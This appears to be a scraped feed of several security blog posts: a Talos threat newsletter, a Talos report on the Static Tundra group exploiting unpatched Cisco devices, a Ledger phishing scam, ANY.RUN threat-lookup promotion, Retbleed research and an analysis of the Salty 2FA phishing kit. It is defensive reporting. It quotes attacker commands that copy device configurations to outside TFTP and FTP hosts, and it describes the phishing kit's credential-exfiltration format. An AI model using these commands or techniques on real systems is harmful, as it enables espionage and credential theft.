Separating truth from fiction is the first step towards making better parenting decisions. Let’s puncture some of the most common misconceptions about online harassment.
WeLiveSecurity – Read More
(Welcome to this week’s edition of the Threat Source newsletter.)
Diane,
2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.
But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics.
Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station.
As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes:
Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness.
Special Agent Dale Cooper
Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise.
If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy.
Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.
Workday Data Breach Bears Signs of Widespread Salesforce Hack
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek)
Novel 5G Attack Bypasses Need for Malicious Base Station
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek)
Internet-wide Vulnerability Enables Giant DDoS Attacks
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called “MadeYouReset,” and it’s raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading)
Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News)
XenoRAT malware campaign hits multiple embassies in South Korea
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)
The art of controlling information
JJ Cummings leads Talos’ Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.
Ransomware incidents in Japan during the first half of 2025
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.
Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).
SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
MD5: 71fea034b422e4a17ebb06022532fdde
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Coinminer:MBT.26mw.in14.Talos
SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201
SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610
MD5: 85bbddc502f7b10871621fd460243fbc
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details
Typical Filename: N/A
Claimed Product: Self-extracting archive
Detection Name: Win.Worm.Bitmin-9847045-0
SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details
Typical Filename: IMG001.exe
Detection Name: Simple_Custom_Detection
SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa
MD5: df11b3105df8d7c70e7b501e210e3cc3
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details
Typical Filename: DOC001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201
Cisco Talos Blog – Read More
Until recently, scammers have mainly focused on targeting cryptocurrency wallets owned by individual users. However, it appears that businesses are increasingly using cryptocurrencies, so attackers are now trying to get their hands on corporate wallets as well. You don’t have to look far for examples. The recently studied Efimer malware, which was distributed to organizations, is capable of swapping cryptocurrency wallet addresses in the clipboard. So we weren’t really surprised to observe cryptocurrency phishing campaigns directed at both individual and corporate users. What did come as a surprise though was the sophistication of the cover story and overall sophistication of the scam.
This particular scheme targets users of Ledger hardware cryptocurrency wallets — specifically the Nano X and Nano S Plus. The scammers send out a phishing email with a lengthy apology. The email claims that, due to a technical flaw, segments of the users’ private keys were transmitted to a Ledger server; the data was well-protected and encrypted, but the “company’s team” had discovered a highly complex data breach. The attackers’ fake story goes on to state that they’d exfiltrated fragments of keys, and then used extremely advanced methods to decrypt and reconstruct some of them — “leading to the theft of crypto assets”. Users are then advised to prevent their crypto wallets from being compromised through the same vulnerability, with the attackers recommending immediately updating the firmware of their device.
Phishing prompt to update the firmware
It’s a compelling story, to be sure. But if you apply some critical thinking, a few inconsistencies crop up. For example, it’s unclear how a fragment of a key could be used to reconstruct the whole thing. It’s also completely baffling what these “advanced decryption methods” are, and how Ledger representatives supposedly know about them.
The email itself is crafted extremely carefully: there’s almost nothing to nitpick. It wasn’t even sent with the help of standard scammer tools; instead, the attackers used a legitimate mailing service, SendGrid. This means the emails have a good reputation and often bypass anti-phishing filters. The only red flags are the sender’s domain and the domain of the website users are told to visit for the firmware update. Needless to say, neither has any connection to Ledger.
The website is also very clean and professionally designed — if you ignore the completely irrelevant domain it’s hosted on, that is. It’s possible the site serves multiple scams, as there’s no mention of a firmware update, and it lists far more devices than the email does. The website even has a functional support chat! While that’s most likely a chatbot, it does respond to questions and gives seemingly helpful advice. The whole point of the site is to get you to enter your seed phrase after you select your device.
The interface for entering seed phrases
A seed phrase is a randomly generated sequence of words used for recovering access to a cryptocurrency wallet. And as you may have guessed, it should not be entered, as anyone who knows it can gain full access to your crypto assets.
On a separate note, when you search for similar sites on Google, you’ll find a surprising number of similar fake pages. This type of scam is clearly quite popular.
Whether you manage your crypto assets on your own devices or simply use regular online banking apps, it’s crucial to stay informed about the latest tactics attackers are using. For company employees, we recommend specialized training tools to boost their awareness of modern cyberthreats. One effective way to do this is by using the Kaspersky Automated Security Awareness Platform. For home users, our blog is a great resource for learning how to spot phishing scams.
Additionally, we recommend installing a robust security solution on both the personal and work devices you use for financial transactions. These solutions can both block access to phishing sites and prevent data breaches.
Kaspersky official blog – Read More
Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.
Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.
Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group’s advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.
Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.
For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.
Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.
While this blog focuses on Static Tundra’s ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.
Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.
One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.
We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.
Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.
Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned active persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. Unpatched devices with Smart Install enabled will continue to be vulnerable to these and other attacks unless and until customers take action.
Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.
After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:
tftp-server nvram:startup-config
This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.
Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of “anonymous” and “public” with read-write permissions.
Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.
Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.
Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.
Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.
Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.
Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.
One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.
Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.
Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).
Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:
do show running-config | redirect tftp://:/conf_bckp copy running-config ftp://user:pass@/output.txt
Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:
Additional identification and detection can be performed using the Cisco forensic guides.
The following strong recommendations apply to entities in all sectors.
|
Indicator |
Type |
Known Activity |
|
185.141.24[.]222 |
IP Address |
2023/03/23 |
|
185.82.202[.]34 |
IP Address |
2025/01/15 – 2025/02/28 |
|
185.141.24[.]28 |
IP Address |
2024/10/01 – 2025/07/03 |
|
185.82.200[.]181 |
IP Address |
2024/10/01 – 2024/11/15 |
Cisco Talos Blog – Read More
One solution can change everything. ANY.RUN’s Threat Intelligence Lookup is living proof of that.
By delivering a browsable source of threat data, it helps your SOC overcome challenges that have to be faced in order to reach higher detection rates and make smarter security decisions.
Find details on how to make the most of TI Lookup below.
ANY.RUN develops essential solutions for SOCs, such as Threat Intelligence Lookup—a searchable database of threat data. Its goal is to bridge the threat intelligence gap for malware analysts by enriching indicators with actionable context.
TI Lookup makes it possible by providing swift access to data collected from millions of malware analyses done in ANY.RUN sandbox by experts who work for 15,000 companies all over the world. This lets you add context to your indicators and tap into this fresh, actionable data on attacks that just happened. The best part is—it’s available at no cost.
The free version of TI Lookup gives you access to 20 most recent sandbox analyses per query, unlocks key search fields (file hashes, URLs, domains, IPs, MITRE ATT&CK techniques, Suricata IDs, etc.), and makes it possible to create compound searches.
For free, you can achieve:
Register in TI Lookup for free, and you’ll be able to access actionable threat insights right away. Apply them in scenarios like these:
A practical example: you need to verify a domain to see if it’s tied to any malicious activities, and if yes, gain more info on it.
Enter it into TI Lookup and you’ll instantly see the result. The following domain, for instance, turned out to be malicious:
domainName: “technologyenterdo.shop”
With a free plan, you can access up to 20 recent analysis sessions that involve it to enrich the indicator with reliable context. In addition to domains, the same can be done for IPs and URLs, also for free.
TI Lookup’s Premium plan would allow you to see even more information. For example, the fact that domain above is labeled with a “malconf” tag. This means that it was retrieved from the very heart of a malicious sample—malware configuration—by ANY.RUN’s experts. Indicators from configs offer trustworthy, valuable insights into the malware’s behavior and impact.
Since around 73% of attacks start with phishing, SOC teams should stay on the lookout for fresh threat samples that can potentially harm your company. One thing you can do is to monitor current TTPs in TI Lookup.
To narrow down your search, you can keep track of threats submitted by analysts from your country. For example, the following query will help you browse Tycoon threats detected in Germany:
threatName:”tycoon” AND submissionCountry:”de”
From there, you can collect indicators from search results and create or update your detection rules in order to stay ahead of potential threats.
Another essential use case of TI Lookup is performing a quick check for an indicator. Let’s see if this hash is connected to any threats:
sha256:”a78cdb5cf41aa777d9fb082e094f7a8b9e73d0b31d8358db3a58a5ba8ae42ca5″
The verdict: it’s associated with Lumma. One simple query, and you’ve received trustworthy result based on actual threat investigations by other analysts.
ANY.RUN also provides access to the interactive MITRE ATT&CK matrix that shows you real-world examples of threats active today. With it, you can learn about different TTPs recently used by threat actors and see how they look in action via ANY.RUN’s Interactive Sandbox.
For that, go to TI Lookup and click any TTP to dig deeper. For example, here are some of the results for T1068: Exploitation for Privilege Escalation:
You see the description for this TTP and links to malicious samples that involve it. Click any analysis session to see the full detonation and retrieve indicators.
TI Lookup’s free version gives you more than just a glimpse into threat intelligence. As we’ve shown above, it can be a powerful solution to a number of SOC challenges.
The Premium plan, however, gives you even more. It’s an enterprise-grade product, helping businesses across infrastructures:
Among Premium features are Query Updates. They automate the process of indicator enrichment by keeping you subscribed to threats and indicators of interest. Enter any query, such as:
threatName:”remcos” AND domainName:””
Click the bell icon, and you’ll start receiving fresh data on new samples that fit your query. As you can see, there are plenty:
Another way to deepen your investigation is to browse Indicators of Behavior (IOBs). This allows you to research attacks using minor artefacts like a suspicious fragment of a command line. Type it in like so:
As a result, you’ll find out that this command line is actually related to AsyncRAT’s steganography attacks:
Trusted by more than 500,000 security professionals and 15,000+ organizations across industries like finance, healthcare, and manufacturing, ANY.RUN empowers teams to investigate malware and phishing threats with speed and accuracy.
With ANY.RUN’s Interactive Sandbox, you can safely analyze suspicious files and URLs, observe live behavior, and extract key insights to dramatically reduce triage and decision-making time.
Tap into Threat Intelligence Lookup and TI Feeds to uncover IOCs, attacker tactics, and behavioral patterns linked to real-world threats for staying one step ahead of evolving attacks.
Experience ANY.RUN’s solutions firsthand to enhance your SOC workflow via a trial period
The post How to Enrich IOCs with Actionable Threat Context: Tips for SOC Analysts appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
In a new paper, Google researchers Matteo Rizzo and Andy Nguyen have detailed an improved Retbleed attack scenario. As we’ve explained in a previous post, the original Retbleed attack exploited vulnerabilities in AMD’s Zen and Zen 2, as well as Intel’s Kaby Lake and Coffee Lake CPUs. Hardware vulnerabilities of this kind are extremely difficult to exploit in realistic settings, which is why the various forms of Spectre and derivative attacks like Retbleed have remained largely theoretical. Despite this, both CPU manufacturers and software developers have implemented methods to mitigate them. The essence of the new Google research is to demonstrate how the effectiveness of the Retbleed attack can be increased. Without fundamentally changing the attack’s architecture, they were able to leverage features of AMD Zen 2 CPUs to read arbitrary data from RAM.
Like Spectre, Retbleed exploits a feature called branch prediction in a computer’s CPU. Branch prediction allows the processor to speculatively execute instructions without waiting for the results of previous computations. Sometimes such predictions are wrong, but normally this only results in a slight, imperceptible slowdown in the application’s performance.
In 2018, the Spectre attack showed that incorrect predictions can be used to steal secrets. This is possible due to two key characteristics. First, the branch prediction system can be trained to access a memory area containing secret data, which then gets loaded into the CPU cache. Second, a way was found to extract this secret data from the cache through a side channel by measuring the execution time of a specific instruction.
Retbleed can be considered an evolution of the Spectre v2 attack: it also exploits the characteristics of the branch prediction system, but differs in how it injects instructions. What’s more, Retbleed can bypass the technology used to protect against Spectre v2, and therefore threatens systems running on more modern hardware. Retbleed remains difficult to implement. A demonstration in ideal conditions by the authors of the original research took a full 90 minutes to extract the secret (in that case a user password).
The researchers from Google were able to significantly accelerate a Retbleed attack. The key takeaway from their work is that arbitrary sections of RAM at 13 KB/s can be read. The accuracy of extracting secret data from the cache is also crucial for such attacks, and in this case it was one hundred percent. The experts demonstrated how the security systems of the operating system kernel – specifically the Linux kernel – can be bypassed. Another significant improvement they made was the use of an attack known as Speculative ROP, which they modified to evade the very same defenses designed for Spectre v2.
According to the researchers, the only limitation of their exploit is the need to know the system’s kernel configuration in advance. This isn’t a major hurdle because many systems use common, standard configurations. Even for unknown configurations, attackers can perform a preliminary analysis.
Most such attacks explore a scenario where malicious code with low privileges runs on a standard computer – ultimately gaining access to sensitive data. However, the same could be said of attacks using traditional malware. If an attacker has already managed to execute arbitrary code on a system, they don’t necessarily need to resort to extremely complex methods for privilege escalation. There are often simpler ways to achieve the same result, such as exploiting a vulnerability in an application or system software.
Attacks like Spectre and Retbleed pose the greatest danger to cloud systems. For a cloud provider, it’s critically important that clients whose virtual machines share the same hardware can’t gain access to other users’ data or hypervisor information. Google’s researchers claim that this new variant of the Retbleed attack allows for exactly that. As a result, Google has stopped using servers with AMD Zen 2 architecture CPUs in its own cloud services for tasks that involve clients executing arbitrary code. So it does seem they’re taking this threat seriously.
Kaspersky official blog – Read More
Today, phishing accounts for the majority of all cyberattacks. The availability of low-cost, easy-to-use Phishing-as-a-Service (PhaaS) platforms like Tycoon2FA, EvilProxy, and Sneaky2FA only makes the problem worse.
These services are actively maintained by their operators; new evasion techniques are regularly added, and the multi-layered infrastructure behind the phishing kits continues to evolve and expand.
But beyond these established players in the PhaaS market, the ANY.RUN team sometimes comes across phishing campaigns that use tools unlike anything we’ve seen before.
One such example is a framework we’ve dubbed Salty 2FA, whose execution chain and infrastructure have not previously been documented.
Like other PhaaS platforms, Salty 2FA is mainly delivered via email and focuses on stealing Microsoft 365 credentials. It unfolds in multiple stages and includes several mechanisms designed to hinder detection and analysis.
Let’s dive deeper into how Salty 2FA works.
During phishing campaign hunting, several ANY.RUN sandbox sessions were identified that had not yet been flagged as malicious. At first glance, they showed familiar traits: Cloudflare Turnstile, a fake Microsoft login page, and unknown domains.
Check analysis sessions:
What stood out in these cases was the domain infrastructure. In the IOCs section of the sessions, a pattern became clear: the consistent use of compound domains in “.com” zones (e.g., .com.de, .it.com) in combination with domains registered under the .ru TLD. The phishing pages themselves also followed a recurring format, embedding “.com” subdomains within a pattern of <sub_domain>.<main_domain>.??.com.
The URI paths hosting the phishing content also appeared unusual. While they initially looked randomly generated and unrelated, further inspection suggested they might share commonalities worth examining.
With this hypothesis in mind, a query was run in Threat Intelligence Lookup:
domainName:”*.*.??.com$” AND domainName:”.ru$”
The results confirmed that this domain pairing is indeed a recurring element tied to phishing activity. Moreover, it highlighted that this indicator had not yet been fully integrated into the detection system, leaving a potential coverage gap.
The initial results left some uncertainty. In addition to the incomplete detection coverage at the time of analysis, the sample included tasks with potential true negative verdicts, as well as tasks tagged under different categories. These ranged from generic phishing labels to Tycoon and EvilProxy; campaigns that had not previously demonstrated the observed behavior (the .??.com + .ru domain combination).
To reduce ambiguity, the query was refined with contextual filters, focusing on specific resources such as requests to Cloudflare.
The updated TI query produced much clearer results, confirming that this activity is almost certainly tied to a distinct phishing operation. However, it cannot yet be definitively attributed to any of the known actors.
Refined TI query:
After a quick review of the external indicators, the next step was to examine the client-side code used in this phishing campaign to better understand its functionality and capabilities.
To capture decrypted traffic and analyze the payload step by step, a similar session was rerun with the MITM proxy enabled.
Check analysis session with MITM enabled
When the page loads from parochially[.]frankfurtwebs[.]com[.]de, a small “trampoline” JavaScript executes. It initializes the Cloudflare Turnstile widget, runs the associated checks, and returns a cf_response token. After that validation, the server delivers the HTML that initiates the main execution chain.
The source code contains comment inserts with inspiring quotes. These do not affect functionality but act as filler “noise,” making static analysis more challenging.
A small JavaScript snippet contains an obfuscated function designed to decode the address of the next stage, retrieve it, decode it in the same way, and then write the result into the DOM of the current page.
Decoding the value lPwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M= reveals the URL of the next payload:
hxxps[://]marketplace24ei[.]ru//
After loading and decoding the payload, the result is a large HTML page—again padded with non-functional “noise” just like the previous stage—with an obfuscated JavaScript snippet at the end.
A quick search through the HTML for <input> tags revealed several matches. One stood out:
<input hidden id=”lessen” value=”aHR0cHM6Ly9tYXJrZXRwbGFjZTI0ZWkucnUvNzkwNjI4LnBocA”>
Decoding the Base64 value exposes another URL that becomes relevant later:
hxxps[://]marketplace24ei[.]ru/790628[.]php
Comparing the HTML source to the session’s runtime behavior also shows that the attacker obfuscates the page text itself. For example, the string:
“Because you’re accessing sensitive info, you need to verify your password.”
appears obfuscated in the code rather than in plain text.
All of the logic for switching between page states, as well as the collection and exfiltration of user input, is handled by the previously mentioned JavaScript code.
After deobfuscating this script, we can walk through its key technical details and capabilities.
To begin with, nearly all of the front-end logic relies on calls to page elements through jQuery. The identifiers for these elements are generated dynamically, making analysis more difficult. In addition, the element IDs themselves are encoded using a combination of Base64 and XOR with a fixed generated value, which must be decoded through a dedicated routine.
The phishing payload also includes several basic defense mechanisms commonly seen in such campaigns:
For exfiltration of the victim’s input, the data is “encrypted” using the same Base64 + XOR technique. This time, however, the key parameter is derived from the victim’s session identifier.
The stolen data is sent to servers using .ru domains from the observed cluster, with endpoints following the format:
/<5-6_digits>.php
The data itself is encoded and placed in the request= parameter of the POST request, while the decoding key (along with the victim’s session ID) is stored in the session= parameter.
Using a POST request captured in the session as an example, the data can be examined by applying the same encoding routine in reverse:
Utilize the following CyberChef recipe to decode the data: https://gchq.github.io/CyberChef/#recipe=URL_Decode(true)From_Base64(%27A-Za-z0-9%2B/%3D%27,true,false)XOR(%7B%27option%27:%27UTF8%27,%27string%27:%27b17be01b20c089141058415728fd66ff%27%7D,%27Standard%27,false)&input=R1JOWUVrY0tFeFpBUlFZU0ZCdFVXUk1LRjFWZFdsQjNVMW9GU2xWWkMwUWY&oeol=VT
In response to the POST request, the server returns a JSON object. The value of the response field depends on the current state of the phishing page; that is, on which opcode was specified when the data was submitted.
Analysis of the code revealed several possible states of the phishing page, along with the data structures transmitted to the attacker as the page transitions between these states.
The identified states are as follows:
| State # | State Name | Function | Trigger | Data Sent (decoded) | Data Received (decoded) |
|---|---|---|---|---|---|
| 1 | Initial state | Prompts victim to enter email | When the phishing login page first loads | n/a | n/a |
| 2 | Switch to password page state | Prompts for password | When the victim enters a valid email | {“op”:”true”,”em”:} | {“status”:, “banner”:, “background”:, “boilerPlateText”:, “token”:, “ho”:} |
| 3 | Switch to “Stay signed in” state | Prompts “Stay signed in?” | When the victim enters a valid password | {“op”:”bk”} | n/a |
| 4 | Switch to “Incorrect password” state | Prompts “Account locked / incorrect password” | When the victim enters an empty or invalid password | n/a | n/a |
| 5 | Switch to “2FA” state | Initiates 2FA handling | When the victim’s account has 2FA enabled | {“op”:”ne”,”em”:,”px”:,”sec”:} | {“status”:, “sec”:, “method”:, “token”:} |
| 6 | Switch to “Process 2FA method” state | Processes the chosen 2FA method | After state #5 | {“m”:,”token”:,”op”:”ver”,”sec”:} | {“status”:, “type”:, “otp”:, “token”:} |
| 6.1 | Phone App Notification 2FA | Handles phone app push notifications | After state #6 | {“op”:”Vx”,”token”:,”service”:”a”,”sec”:} | {“status”:} |
| 6.2 | Phone App OTP 2FA | Handles OTP from phone app | After state #6 | {“op”:”Vx”,”token”:,”service”:”c”,”otc”:,”sec”:} | {“status”:, “newToken”:} |
| 6.3 | OneWaySMS 2FA | Handles one-way SMS OTP | After state #6 | {“op”:”Vx”,”token”:,”service”:”b”,”otc”:,”sec”:} | {“status”:, “newTokenn”:} |
| 6.4 | TwoWayVoiceMobile 2FA | Handles mobile voice call 2FA | After state #6 | {“op”:”Vx”,”token”:,”service”:”d”,”sec”:} | {“status”:, “calltoken”:} |
| 6.5 | TwoWayVoiceOffice 2FA | Handles office phone voice call 2FA | After state #6 | {“op”:”Vx”,”token”:,”service”:”e”,”sec”:} | {“status”:, “newtokenoff”:} |
| 6.6 | Companion Apps Notification 2FA | Handles companion app push notifications | After state #6 | {“op”:”Vx”,”token”:,”service”:”o”,”sec”:} | {“status”:} |
Based on the complexity of its infrastructure, such as the use of multiple domains across specific TLDs, including a dedicated domain for data exfiltration, the presence of evasion techniques, and its extensive functionality (credential validation, handling multiple 2FA methods, and intercepting OTP codes), this campaign appears to represent a new PhaaS framework. Its behavioral patterns differ from those of the major players in the phishing ecosystem, such as Tycoon, EvilProxy, and others.
At the time of initial research, no clear evidence was found to indicate who operates or develops this phishing kit, how the attackers obtain access (e.g., whether they purchase software), or any distinctive technical traits that would link it to other known kits.
After updating detection methods and re-hunting indicators in the ANY.RUN Sandbox and TI, some overlap in IOCs (specifically domains) emerged with activity tracked as Storm-1575 and Storm-1747.
Storm-1575 is associated with the PhaaS platform Dadsec and is presumed to be its developer. However, Dadsec activity has not been observed recently, and attribution boundaries for Storm-1575 remain unclear.
